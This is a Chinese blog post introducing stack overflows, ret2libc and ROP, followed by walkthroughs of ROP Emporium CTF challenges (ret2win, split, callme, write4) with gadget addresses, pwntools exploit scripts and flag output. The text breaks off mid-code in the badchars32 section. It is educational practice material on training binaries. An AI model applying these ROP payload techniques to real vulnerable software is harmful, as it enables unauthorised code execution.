<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="博客，代码，安全，日常" />
   
  <meta name="description" content="记录学习与生活" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    Linux Pwn - 栈溢出与ROP（一） |  lzeroyuee&#39;s blog
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/images/my.png" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">
  
<link rel="stylesheet" href="/css/custom.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

<link rel="alternate" href="/atom.xml" title="lzeroyuee's blog" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    
      
      <canvas width="1777" height="841"
        style="position: fixed; left: 0px; top: 0px; z-index: 99999; pointer-events: none;"></canvas>
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-Linux-Pwn-栈溢出与ROP（一）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  Linux Pwn - 栈溢出与ROP（一）
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/" class="article-date">
  <time datetime="2021-03-04T14:56:17.000Z" itemprop="datePublished">2021-03-04</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">2.6k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">12 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="Linux-Pwn-栈溢出与ROP（一）"><a href="#Linux-Pwn-栈溢出与ROP（一）" class="headerlink" title="Linux Pwn - 栈溢出与ROP（一）"></a>Linux Pwn - 栈溢出与ROP（一）</h1><h2 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h2><p>栈溢出属于缓冲区溢出的一种，利用方法包括shellcode注入、ret2libc、ROP等</p>
<p>主要通过对缓冲区的写入，覆盖栈上数据，控制关键数据达到控制程序执行流程</p>
<p>有关栈帧的相关资料参考：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/stackoverflow/stack-intro/">栈介绍</a></p>
<h3 id="shellcode注入与ret2libc"><a href="#shellcode注入与ret2libc" class="headerlink" title="shellcode注入与ret2libc"></a>shellcode注入与ret2libc</h3><p>shellcode注入与ret2libc是两种比较简单的利用方式</p>
<ul>
<li>shellcode注入<ul>
<li>将shellcode作为payload填充入缓冲区中，覆盖返回地址为合适的值以便在函数返回值可直接控制<code>eip</code>跳转到shellcode上，经典的跳板指令<code>jmp esp</code>便是其方法利用的指令之一</li>
<li>此方式通常需要关闭NX保护</li>
</ul>
</li>
<li>ret2libc<ul>
<li>将返回地址覆盖为<code>system</code>的地址，并在此返回地址上方偏移<code>+4</code>（x86平台下）构造传入<code>/bin/sh</code>的地址，在函数返回值变跳转执行<code>system(&quot;/bin/sh&quot;)</code></li>
</ul>
</li>
</ul>
<h2 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h2><p><a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Return-oriented_programming">返回向导编程（Return-Oriented Programming）</a>，通过扫描目标文件，提取出可用的<strong>gadget</strong>（通常以<code>ret(0xc3)</code>结尾）。将这些<strong>gadget</strong>按照功能进行组合，形成shellcode攻击链</p>
<p><a target="_blank" rel="noopener" href="https://firmianay.gitbook.io/ctf-all-in-one/3_topics/pwn/3.1.4_rop_x86">返回导向编程（ROP）（x86）</a></p>
<h3 id="gadget"><a href="#gadget" class="headerlink" title="gadget"></a>gadget</h3><h4 id="寻找gadget"><a href="#寻找gadget" class="headerlink" title="寻找gadget"></a>寻找gadget</h4><ul>
<li>扫描二进制找到<code>ret(0xc3)</code>指令，将其作为<strong>trie</strong>根节点<ul>
<li>回溯解析前面的指令，如果是有效指令，将其作为子节点，后续判断是否是<strong>boring</strong>；如果不是有效指令，则继续递归回溯。</li>
</ul>
</li>
<li><strong>boring</strong>指令份为三种情况：<ul>
<li>该指令是<code>leave</code>，后面跟一个<code>ret</code></li>
<li>该指令是一个<code>pop reg</code>，后面跟一个<code>ret</code></li>
<li>该指令是返回或者非条件跳转</li>
</ul>
</li>
</ul>
<p>在实际操作中，有很多工具可用帮助寻找<strong>gadget</strong>，比如<strong>ROPGadget</strong>、<strong>Ropper</strong>等，在线网站有<a target="_blank" rel="noopener" href="http://ropshell.com/">ropshell</a></p>
<h4 id="常用gadget"><a href="#常用gadget" class="headerlink" title="常用gadget"></a>常用gadget</h4><ul>
<li>保存栈数据到寄存器上<ul>
<li><code>pop eax; ret</code></li>
</ul>
</li>
<li>保存内存数据到寄存器上<ul>
<li><code>mov ecx, [eax]; ret</code></li>
</ul>
</li>
<li>保存寄存器数据到内存<ul>
<li><code>mov [eax], ecx; ret</code></li>
</ul>
</li>
<li>算术和逻辑运算<ul>
<li><code>add eax, ebx; ret</code></li>
<li><code>xor edx, edx; ret</code></li>
</ul>
</li>
<li>系统调用<ul>
<li><code>int 0x80; ret</code></li>
<li><code>call gs:[0x10]; ret</code></li>
</ul>
</li>
<li>用以影响栈帧的gadget<ul>
<li><code>leave; ret</code></li>
<li><code>pop ebp; ret</code></li>
</ul>
</li>
</ul>
<h3 id="ROP变种"><a href="#ROP变种" class="headerlink" title="ROP变种"></a>ROP变种</h3><p>ROP与正常的程序流程有很大不同，最直观的有两点：</p>
<ol>
<li>ROP流会包含很多<code>ret</code>指令，且这些<code>ret</code>指令可能间距间隔很短</li>
<li>ROP利用<code>ret</code>指令控制指令流程，而这些<code>ret</code>在进行栈回卷时没有与之对应的<code>call</code>指令</li>
</ol>
<p>针对以上两点，就可用来做检测，为了对抗这种检测，产生了一种不依赖于<code>ret</code>指令的ROP变种 —— 使用<code>ret</code>的等价指令序列，其中之一如下：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">pop</span> <span class="built_in">eax</span><span class="comment">; jmp eax		; 间接跳转</span></span><br><span class="line"><span class="keyword">pop</span> <span class="built_in">eax</span><span class="comment">; jmp [eax]		; 双重间接跳转</span></span><br></pre></td></tr></table></figure>


<h1 id="ROP-Emporium"><a href="#ROP-Emporium" class="headerlink" title="ROP Emporium"></a>ROP Emporium</h1><p><a target="_blank" rel="noopener" href="https://ropemporium.com/">ROP Emporium</a>该项目是一个学习ROP的很好的资料，包含x86和x64程序来进行练习，以下挑几个最基本的写一下</p>
<h2 id="ret2win32"><a href="#ret2win32" class="headerlink" title="ret2win32"></a>ret2win32</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     i386-32-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure>
<p>在<code>pwnme</code>函数中存在栈溢出，且在ida中可用很简单的算出缓冲区首地址距返回地址有<strong>44</strong>个字节，且内部存在一<code>ret2win</code>函数，该函数地址<code>0x0804862C</code></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">ret2win</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Well done! Here&#x27;s your flag:&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> system(<span class="string">&quot;/bin/cat flag.txt&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>于是可用覆盖返回地址到此函数上，执行<code>system</code>打印flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">pwn@ubuntu:~/workspace/ROP/ret2win32$ python -c <span class="string">&quot;print(&#x27;A&#x27; * 44 + &#x27;\x2c\x86\x04\x08&#x27;)&quot;</span> | ./ret2win32 </span><br><span class="line">ret2win by ROP Emporium</span><br><span class="line">x86</span><br><span class="line"></span><br><span class="line">For my first trick, I will attempt to fit <span class="number">56</span> <span class="built_in">bytes</span> of user <span class="built_in">input</span> into <span class="number">32</span> <span class="built_in">bytes</span> of stack buffer!</span><br><span class="line">What could possibly go wrong?</span><br><span class="line">You there, may I have your input please? And don&#x27;t worry about null bytes, we&#x27;re using read()!</span><br><span class="line"></span><br><span class="line">&gt; Thank you!</span><br><span class="line">Well done! Here<span class="string">&#x27;s your flag:</span></span><br><span class="line"><span class="string">ROPE&#123;a_placeholder_32byte_flag!&#125;</span></span><br></pre></td></tr></table></figure>


<h2 id="ret2win"><a href="#ret2win" class="headerlink" title="ret2win"></a>ret2win</h2><p>与<strong>ret2win32</strong>同样的套路，只是换成了x64，缓冲区首地址距返回地址有<strong>40</strong>个字节，<code>ret2win</code>函数地址<code>0x400756</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">pwn@ubuntu:~/workspace/ROP/ret2win$ python -c <span class="string">&quot;print(&#x27;A&#x27; * 40 + &#x27;\x56\x07\x40\x00\x00\x00\x00\x00&#x27;)&quot;</span> | ./ret2win</span><br><span class="line">ret2win by ROP Emporium</span><br><span class="line">x86_64</span><br><span class="line"></span><br><span class="line">For my first trick, I will attempt to fit <span class="number">56</span> <span class="built_in">bytes</span> of user <span class="built_in">input</span> into <span class="number">32</span> <span class="built_in">bytes</span> of stack buffer!</span><br><span class="line">What could possibly go wrong?</span><br><span class="line">You there, may I have your input please? And don&#x27;t worry about null bytes, we&#x27;re using read()!</span><br><span class="line"></span><br><span class="line">&gt; Thank you!</span><br><span class="line">Well done! Here<span class="string">&#x27;s your flag:</span></span><br><span class="line"><span class="string">ROPE&#123;a_placeholder_32byte_flag!&#125;</span></span><br></pre></td></tr></table></figure>


<h2 id="split32"><a href="#split32" class="headerlink" title="split32"></a>split32</h2><p><strong>ret2win32</strong>的加强版，在ida中可用找到如下信息：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">.data:0804A030 usefulString    db <span class="string">&#x27;/bin/cat flag.txt&#x27;</span>,0</span><br><span class="line"></span><br><span class="line">.text:0804860C usefulFunction  proc near</span><br><span class="line">.text:0804860C ; __unwind &#123;</span><br><span class="line">.text:0804860C                 push    ebp</span><br><span class="line">.text:0804860D                 mov     ebp, esp</span><br><span class="line">.text:0804860F                 sub     esp, 8</span><br><span class="line">.text:08048612                 sub     esp, 0Ch</span><br><span class="line">.text:08048615                 push    offset <span class="built_in">command</span>  ; <span class="string">&quot;/bin/ls&quot;</span></span><br><span class="line">.text:0804861A                 call    _system</span><br><span class="line">.text:0804861F                 add     esp, 10h</span><br><span class="line">.text:08048622                 nop</span><br><span class="line">.text:08048623                 leave</span><br><span class="line">.text:08048624                 retn</span><br><span class="line">.text:08048624 ; &#125; // starts at 804860C</span><br><span class="line">.text:08048624 usefulFunction  endp</span><br></pre></td></tr></table></figure>
<p>缓冲区首地址距返回地址有<strong>44</strong>个字节，可用将返回地址覆盖为<code>0x0804861A</code>即<code>call _system</code>，然后在随后的栈上填写<code>usefulString</code>的地址<code>0x0804A030</code>，这样在返回时，又调用了<code>call _system</code>将下条指令地址压栈成为新的返回地址，而新的返回地址上方就是<code>usefulString</code>，就形成了<code>system(usefulString)</code>的调用栈</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pwn@ubuntu:~/workspace/ROP/split32$ python -c <span class="string">&quot;print(&#x27;A&#x27; * 44 + &#x27;\x1a\x86\x04\\x08&#x27; + &#x27;\x30\xa0\x04\x08&#x27;)&quot;</span> | ./split32 </span><br><span class="line">split by ROP Emporium</span><br><span class="line">x86</span><br><span class="line"></span><br><span class="line">Contriving a reason to ask user <span class="keyword">for</span> data...</span><br><span class="line">&gt; Thank you!</span><br><span class="line">ROPE&#123;a_placeholder_32byte_flag!&#125;</span><br></pre></td></tr></table></figure>


<h2 id="split"><a href="#split" class="headerlink" title="split"></a>split</h2><p>同样的套路，缓冲区首地址距返回地址有<strong>40</strong>个字节，不过在x64下，传参需要用到寄存器<code>rdi</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">.data:0000000000601060 usefulString    db <span class="string">&#x27;/bin/cat flag.txt&#x27;</span>,0</span><br><span class="line"></span><br><span class="line">.text:0000000000400742 usefulFunction  proc near</span><br><span class="line">.text:0000000000400742 ; __unwind &#123;</span><br><span class="line">.text:0000000000400742                 push    rbp</span><br><span class="line">.text:0000000000400743                 mov     rbp, rsp</span><br><span class="line">.text:0000000000400746                 mov     edi, offset <span class="built_in">command</span> ; <span class="string">&quot;/bin/ls&quot;</span></span><br><span class="line">.text:000000000040074B                 call    _system</span><br><span class="line">.text:0000000000400750                 nop</span><br><span class="line">.text:0000000000400751                 pop     rbp</span><br><span class="line">.text:0000000000400752                 retn</span><br><span class="line">.text:0000000000400752 ; &#125; // starts at 400742</span><br><span class="line">.text:0000000000400752 usefulFunction  endp</span><br></pre></td></tr></table></figure>
<p>通过<code>ROPgadget</code>查找<code>pop rdi; ret</code>指令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwn@ubuntu:~/workspace/ROP/split$ ROPgadget --binary ./split --only <span class="string">&quot;pop|ret&quot;</span> | grep rdi</span><br><span class="line">0x00000000004007c3 : pop rdi ; ret</span><br></pre></td></tr></table></figure>
<p>于是可用构造ROP：<code>gadget_addr + usefulString + call _system </code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pwn@ubuntu:~/workspace/ROP/split$ python -c <span class="string">&quot;print(&#x27;A&#x27; * 40 + &#x27;\xc3\x07\x40\x00\x00\x00\x00\x00&#x27; + &#x27;\x60\x10\x60\x00\x00\x00\x00\x00&#x27; + &#x27;\x4b\x07\x40\x00\x00\x00\x00\x00&#x27;)&quot;</span> | ./split </span><br><span class="line">split by ROP Emporium</span><br><span class="line">x86_64</span><br><span class="line"></span><br><span class="line">Contriving a reason to ask user <span class="keyword">for</span> data...</span><br><span class="line">&gt; Thank you!</span><br><span class="line">ROPE&#123;a_placeholder_32byte_flag!&#125;</span><br><span class="line">Segmentation fault (core dumped)</span><br></pre></td></tr></table></figure>


<h2 id="callme32"><a href="#callme32" class="headerlink" title="callme32"></a>callme32</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Arch:     i386-32-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x8048000)</span><br><span class="line">RUNPATH:  <span class="string">&#x27;.&#x27;</span></span><br></pre></td></tr></table></figure>
<p>缓冲区首地址距返回地址有<strong>44</strong>个字节，且依赖同目录下的<code>libcallme32.so</code></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> __noreturn <span class="title">usefulFunction</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  callme_three(<span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>);</span><br><span class="line">  callme_two(<span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>);</span><br><span class="line">  callme_one(<span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>);</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>callme_one(0xDEADBEEF, 0xCAFEBABE, 0xD00DF00D)</code>、<code>callme_two(0xDEADBEEF, 0xCAFEBABE, 0xD00DF00D)</code>、<code>callme_three(0xDEADBEEF, 0xCAFEBABE, 0xD00DF00D)</code>三个函数需要传递正确的参数，其中第一个函数用于读取加密后的flag，剩下两个则是解密函数</p>
<p>此处rop的构造可以利用到这三个函数的plt，依次去调用这三个函数</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pwn@ubuntu:~/workspace/ROP/callme32$ objdump -d -j .plt callme32 | grep callme</span><br><span class="line">callme32:     file format elf32-i386</span><br><span class="line">080484e0 &lt;callme_three@plt&gt;:</span><br><span class="line">080484f0 &lt;callme_one@plt&gt;:</span><br><span class="line">08048550 &lt;callme_two@plt&gt;:</span><br></pre></td></tr></table></figure>
<p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">p = process(<span class="string">&quot;./callme32&quot;</span>)</span><br><span class="line">e = ELF(<span class="string">&quot;./callme32&quot;</span>)</span><br><span class="line"></span><br><span class="line">callme_one = e.plt[<span class="string">&quot;callme_one&quot;</span>]</span><br><span class="line">callme_two = e.plt[<span class="string">&quot;callme_two&quot;</span>]</span><br><span class="line">callme_three = e.plt[<span class="string">&quot;callme_three&quot;</span>]</span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&quot;callme_one =&gt; %s&quot;</span> % <span class="built_in">hex</span>(callme_one))</span><br><span class="line">log.info(<span class="string">&quot;callme_two =&gt; %s&quot;</span> % <span class="built_in">hex</span>(callme_two))</span><br><span class="line">log.info(<span class="string">&quot;callme_three =&gt; %s&quot;</span> % <span class="built_in">hex</span>(callme_three))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 参数</span></span><br><span class="line">arg1 = <span class="number">0xDEADBEEF</span></span><br><span class="line">arg2 = <span class="number">0xCAFEBABE</span></span><br><span class="line">arg3 = <span class="number">0xD00DF00D</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x080487f9 : pop esi ; pop edi ; pop ebp ; ret</span></span><br><span class="line">pop_ret = <span class="number">0x080487f9</span>	<span class="comment"># 此rop为了平栈</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">44</span> + \</span><br><span class="line">            p32(callme_one) + p32(pop_ret) + p32(arg1) + p32(arg2) + p32(arg3) + \</span><br><span class="line">            p32(callme_two) + p32(pop_ret) + p32(arg1) + p32(arg2) + p32(arg3) + \</span><br><span class="line">            p32(callme_three) + p32(pop_ret) + p32(arg1) + p32(arg2) + p32(arg3)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;&gt; &quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">data = p.recvall()</span><br><span class="line">log.info(<span class="string">&quot;flag =&gt; \n&quot;</span> + data)</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/callme32.png"></p>
<h2 id="callme"><a href="#callme" class="headerlink" title="callme"></a>callme</h2><p>改为x64，也就把ROP链改一下即可，缓冲区首地址距返回地址有<strong>40</strong>个字节</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">arg1 = <span class="number">0xDEADBEEFDEADBEEF</span></span><br><span class="line">arg2 = <span class="number">0xCAFEBABECAFEBABE</span></span><br><span class="line">arg3 = <span class="number">0xD00DF00DD00DF00D</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x000000000040093c : pop rdi ; pop rsi ; pop rdx ; ret</span></span><br><span class="line">pop_ret = <span class="number">0x000000000040093c</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">40</span> + \</span><br><span class="line">            p64(pop_ret) + p64(arg1) + p64(arg2) + p64(arg3) + p64(callme_one) + \</span><br><span class="line">            p64(pop_ret) + p64(arg1) + p64(arg2) + p64(arg3) + p64(callme_two) + \</span><br><span class="line">            p64(pop_ret) + p64(arg1) + p64(arg2) + p64(arg3) + p64(callme_three)</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/callme.png"></p>
<h2 id="write432"><a href="#write432" class="headerlink" title="write432"></a>write432</h2><p>向内存中写入<code>flag.txt</code>，在调用<code>print_file</code>函数，可以发现<code>.data</code>段是可写的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pwn@ubuntu:~/workspace/ROP/write432$ readelf -S write432 | grep data</span><br><span class="line">  [16] .rodata           PROGBITS        080485c8 0005c8 000014 00   A  0   0  4</span><br><span class="line">  [24] .data             PROGBITS        0804a018 001018 000008 00  WA  0   0  4</span><br></pre></td></tr></table></figure>
<p>选择写入地址为<code>0x0804a018</code>，ROP选择使用<code>pop|mov|ret</code>组合，首先通过<code>pop</code>设置好栈上内容和目标地址，通过<code>mov</code>来实现数据写入，如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&quot;./write432&quot;</span>)</span><br><span class="line">e = ELF(<span class="string">&quot;./write432&quot;</span>)</span><br><span class="line"></span><br><span class="line">print_file = e.plt[<span class="string">&quot;print_file&quot;</span>]</span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&quot;print_file =&gt; %s&quot;</span> % <span class="built_in">hex</span>(print_file))</span><br><span class="line"></span><br><span class="line">data_addr = <span class="number">0x0804a018</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x08048543 : mov dword ptr [edi], ebp ; ret</span></span><br><span class="line"><span class="comment"># 0x080485aa : pop edi ; pop ebp ; ret</span></span><br><span class="line">pop_edi_pop_ebp = <span class="number">0x080485aa</span></span><br><span class="line">mov_Medi_ebp = <span class="number">0x08048543</span></span><br><span class="line">flag_file = <span class="string">&quot;flag.txt&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">44</span> + \</span><br><span class="line">          p32(pop_edi_pop_ebp) + p32(data_addr) + flag_file[:<span class="number">4</span>] + p32(mov_Medi_ebp) + \</span><br><span class="line">          p32(pop_edi_pop_ebp) + p32(data_addr + <span class="number">4</span>) + flag_file[<span class="number">4</span>:] + p32(mov_Medi_ebp) + \</span><br><span class="line">          p32(print_file) + <span class="string">&quot;BBBB&quot;</span> + p32(data_addr)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;&gt; &quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">log.info(p.recvall())</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/write432.png"></p>
<h2 id="write4"><a href="#write4" class="headerlink" title="write4"></a>write4</h2><p>改为x64版本即可，直接8字节传送</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">data_addr = <span class="number">0x0000000000601028</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x0000000000400628 : mov qword ptr [r14], r15 ; ret</span></span><br><span class="line"><span class="comment"># 0x0000000000400690 : pop r14 ; pop r15 ; ret</span></span><br><span class="line"><span class="comment"># 0x0000000000400693 : pop rdi ; ret</span></span><br><span class="line">mov_Mr14_r15 = <span class="number">0x0000000000400628</span></span><br><span class="line">pop_r14_r15 = <span class="number">0x0000000000400690</span></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400693</span></span><br><span class="line">flag_file = <span class="string">&quot;flag.txt&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">40</span> + \</span><br><span class="line">          p64(pop_r14_r15) + p64(data_addr) + flag_file + p64(mov_Mr14_r15) + p64(pop_rdi) + p64(data_addr) + p64(print_file)</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/write4.png"></p>
<h2 id="badchars32"><a href="#badchars32" class="headerlink" title="badchars32"></a>badchars32</h2><p>在上题的基础上对输入进行了过滤</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">v1 = read(<span class="number">0</span>, v4, <span class="number">0x200</span>u);</span><br><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v1; ++i )</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">for</span> ( j = <span class="number">0</span>; j &lt;= <span class="number">3</span>; ++j )</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ( v4[i] == badcharacters[j] )          <span class="comment">// 过滤“xga.”字符</span></span><br><span class="line">            v4[i] = <span 